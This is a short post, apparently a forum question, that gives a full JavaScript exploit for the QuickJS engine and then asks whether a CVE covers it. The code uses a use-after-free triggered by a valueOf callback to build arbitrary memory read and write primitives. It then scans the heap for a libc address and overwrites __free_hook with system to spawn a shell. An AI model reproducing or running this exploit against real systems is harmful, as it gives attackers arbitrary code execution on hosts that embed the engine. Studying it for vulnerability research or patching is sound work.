quickjs exploit

exploit.js

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) {
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) {
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

(() => {

var pwn = new ArrayBuffer(0x48);
var pwn5 = new ArrayBuffer(0x48);
var pwn2 = new ArrayBuffer(0x420);
var cc = [];
b = [0,1,2];
cc = [];
pwn.valueOf = () => {
    b[0] = new Float64Array(pwn);
    pwn = 0;
};
pwn++;
pwn = 0;
const heap = ftoi(b[0][1])
cc.push(new Float64Array(pwn5));
cc.push(new Float64Array(pwn5));
console.log(ftoi(b[0][0]));
console.log(heap);
const read64 = (addr) => {
    b[0][7] = itof(addr);
    return ftoi(cc[1][0]);

}
const write64 = (addr, val) => {
    b[0][7] = itof(addr);
    cc[1][0] = itof(val);
}

i = 0;
pwn2 = 0;
var libc_addr = 0;
var tmp = 0;
var tmp2 = 0;
for(let i=0;i<0x100000;i++) {
    libc_addr = read64(BigInt(heap)+BigInt(i)*BigInt(8))&BigInt(0xfff000000000)
    if(libc_addr == 0x7ff000000000) {
        libc_addr = read64(BigInt(heap)+BigInt(i)*BigInt(8))
        tmp = read64(BigInt(heap)+BigInt(i+1)*BigInt(8))
        tmp2 = read64(BigInt(heap)+BigInt(i-1)*BigInt(8))
        if(libc_addr == tmp && tmp2 < 0x500) {
            break;
        }
    }
}
console.log(libc_addr)
cc[0][0] = itof(BigInt(26739)) // sh
write64(BigInt(libc_addr)+BigInt(12104), BigInt(libc_addr)-BigInt(1664976)) // free_hook = system
cc[0] = 0

})();

Any references for this? (like CVE or sth?)